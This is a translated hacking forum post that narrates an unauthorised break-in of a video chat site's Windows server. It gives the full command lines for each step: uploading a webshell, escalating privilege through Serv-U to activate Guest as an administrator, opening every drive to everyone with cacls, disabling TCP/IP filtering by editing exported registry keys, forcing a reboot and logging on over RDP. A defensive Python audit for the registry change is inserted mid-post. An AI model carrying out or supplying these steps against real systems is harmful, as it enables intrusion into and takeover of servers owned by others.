From uploading a webshell, to breaking through TCP/IP filtering, to logging on to the 3389 terminal

Source: Internet
Author: Lvhuana
1. Obtain webshell
This is just a small test from this evening. Since I am still a newbie, I can't use any advanced techniques and can only do things this way ..........
Everything was already over by the time I wrote this, so there is no way to add screenshots. I hope this small post is still understandable.
Today was a boring day. Being bored at night, I went to a video chat site to watch the shows ~
Suddenly I found a room that was especially popular: it already had 500 people (full), and after refreshing n times I still couldn't get in .......... even more depressing! :(
With nothing else to do, I thought: let's test how well this host's security is done.
Ping the site from cmd to get the other party's IP address, then try to log on to the terminal.
After a long search, I finally found a vulnerable upload page at http://www.xxxx.net/upfile_soft.asp and uploaded a webshell (the official version of Haiyang 2005) first. (How to upload it is not the interesting part; upload tools are everywhere now.)

2. Successfully elevating privileges and creating a user
After obtaining the webshell, I happily logged on and suddenly found that I had hardly any permissions. I could only operate inside the directory where my webshell was located (drives C, D, E and F could not be browsed); I did not even have permission to delete files. Depressing ........
I went back to check what services were enabled on the host. After discovering that it had Terminal Services and Serv-U running, I started scanning its IP address with SuperScan, and I saw from the banner that it was running Serv-U version 5.0.
I went to the WScript.Shell page to check whether CMD commands could be run: at first the command could not be executed, and nothing came back after entering net user. I tried again, and this time WScript.Shell did execute the CMD command: entering net user again returned the other party's user list. Haha, this is good. It can be won!!
I uploaded the Serv-U privilege escalation tool to the D:\a004\tggtwe\****.com\uploadsoft directory, renamed it test.exe, and went back to WScript.Shell to run commands. Hey, a new broiler (compromised host) will be ready soon ~
Run CMD commands through WScript.Shell:
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "net user guest /active:yes" # activate the Guest account; I like to use this account
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "net user guest lvhuana" # set the Guest account's password to lvhuana
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "net localgroup administrators guest /add" # add Guest to the administrators group
OK. After the account is set up, run net localgroup administrators to check whether the account was added; the echo shows it succeeded. Then run netstat -an and you can see that the terminal port open is the default 3389. OK, try connecting to it ~

3. TCP/IP filtering
Unable to connect!? Dizzy ...... Then I took out SuperScan to scan its 3389, and nothing was found ...... (Is a firewall enabled!? Oh, my luck is really bad .....)
No way around it. Go back to WScript.Shell and run CMD commands:
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "cacls.exe C:\ /e /t /g everyone:F" # grant everyone full control of drive C so it can be browsed
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "cacls.exe D:\ /e /t /g everyone:F" # grant everyone full control of drive D so it can be browsed
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "cacls.exe E:\ /e /t /g everyone:F" # grant everyone full control of drive E so it can be browsed
D:\a004\tggtwe\*****.com\uploadsoft\test.exe "cacls.exe F:\ /e /t /g everyone:F" # grant everyone full control of drive F so it can be browsed
Now I could at least traverse the whole hard disk. I rummaged through it and couldn't find any firewall files, so I knew: it must be TCP/IP filtering! (Of course, it is also possible that the server sits on an intranet; you can determine that from ipconfig /all.)
To break through TCP/IP filtering we can modify the registry: export the three relevant registry keys, edit them, and import them back. Back on the WScript.Shell page, run:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" # export the first part of the TCP/IP filtering settings from the registry
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" # export the second part of the TCP/IP filtering settings from the registry
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" # export the third part of the TCP/IP filtering settings from the registry
Then go back to the Stream or FSO page and find that 1.reg, 2.reg and 3.reg are quietly lying there ~
Download 1.reg, 2.reg and 3.reg to your own hard disk and edit them, changing the TCP/IP filtering part. In 1.reg find "EnableSecurityFilters"=dword:00000001 and change the last digit from 1 to 0; then change 2.reg and 3.reg the same way. I won't repeat it ~
Then upload 1.reg, 2.reg and 3.reg back to the target machine (choose overwrite mode here, because we do not have permission to delete the original 1.reg, 2.reg and 3.reg). After the upload succeeds, go back to the WScript.Shell page and run:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\1.reg" # silently import the modified 1.reg into the registry
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\2.reg" # silently import the modified 2.reg into the registry
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\3.reg" # silently import the modified 3.reg into the registry
OK! After the import, the machine has to be restarted for the TCP/IP filtering change to take effect. Then run the CMD command in WScript.Shell:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "iisreset /reboot /timeout:00" # use its own IIS service to restart the machine; /timeout:00 makes it restart immediately
After this runs, SuperScan can no longer reach it ~ it restarted!
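A defender reading this post will want the opposite of the edit above: a check that notices when the exported TCP/IP filtering setting has been turned off. The following audit is an added example of mine, not code from the post or its author. It parses .reg exports in the format that regedit -e writes and reports every control set where EnableSecurityFilters is zero, or where the value is missing altogether. It assumes the value lives under the Parameters subkey of the Tcpip service (the post names only the Tcpip key itself); the two sample exports are constructed, and the extra values in them are filler.

```python
import re

# Constructed sample exports in the layout "regedit -e" produces. Only the
# EnableSecurityFilters line matters; the other values are invented filler.
CLEAN_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip]
"Start"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001
"Hostname"="web01"
"""

# Same layout, but with the filtering switch flipped off (the edit the post describes).
TAMPERED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000000
"""

KEY_LINE = re.compile(r"^\[(.+)\]$")
DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')


def parse_reg_dwords(reg_text):
    """Return {key_path: {value_name: int}} for every DWORD value in a .reg export.

    String, binary and default values are ignored; comment lines (";") are skipped.
    """
    keys = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        key = KEY_LINE.match(line)
        if key:
            current = key.group(1)
            keys.setdefault(current, {})
            continue
        dword = DWORD_LINE.match(line)
        if dword and current is not None:
            keys[current][dword.group(1)] = int(dword.group(2), 16)
    return keys


def tcpip_filter_state(reg_text):
    """Map each control set in the export to whether TCP/IP filtering is enabled there.

    Assumed location of the switch: HKLM\\SYSTEM\\<control set>\\Services\\Tcpip\\Parameters,
    value EnableSecurityFilters (non-zero means filtering is on).
    """
    states = {}
    for key, values in parse_reg_dwords(reg_text).items():
        parts = key.split("\\")
        if len(parts) != 6:
            continue
        if [p.lower() for p in parts[3:]] != ["services", "tcpip", "parameters"]:
            continue
        for name, number in values.items():
            if name.lower() == "enablesecurityfilters":
                states[parts[2]] = number != 0
    return states


def audit_exports(exports):
    """exports: {file label: export text}. Returns one finding string per problem found."""
    findings = []
    for label, text in exports.items():
        states = tcpip_filter_state(text)
        if not states:
            findings.append(f"{label}: no EnableSecurityFilters value under a Tcpip\\Parameters key")
        for control_set, enabled in sorted(states.items()):
            if not enabled:
                findings.append(f"{label}: TCP/IP filtering is disabled in {control_set}")
    return findings


if __name__ == "__main__":
    for finding in audit_exports({"1.reg": CLEAN_EXPORT, "3.reg": TAMPERED_EXPORT}):
        print(finding)
```

When reading real export files from disk, note that regedit on Windows 2000 and later writes them as UTF-16 with a byte-order mark, so open them with encoding="utf-16" before passing the text in; a file whose only Tcpip key lacks the Parameters subkey will be reported as missing the value, which is itself worth a look.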

4. Logging on to the terminal successfully
After a long wait (actually not that long, but I couldn't wait, hey ~), SuperScan could finally reach it again and found port 3389 open. Haha, it finally worked. I took out the terminal client and logged on with user Guest and the password I had just set, lvhuana!
Okay, this spam article should end here. It's already early morning, time to wrap up and go to bed ~ Since I'm a newbie, mistakes are inevitable; I hope you will correct them!
(If you repost this, please keep the author information. It is not easy to write something this long .............)
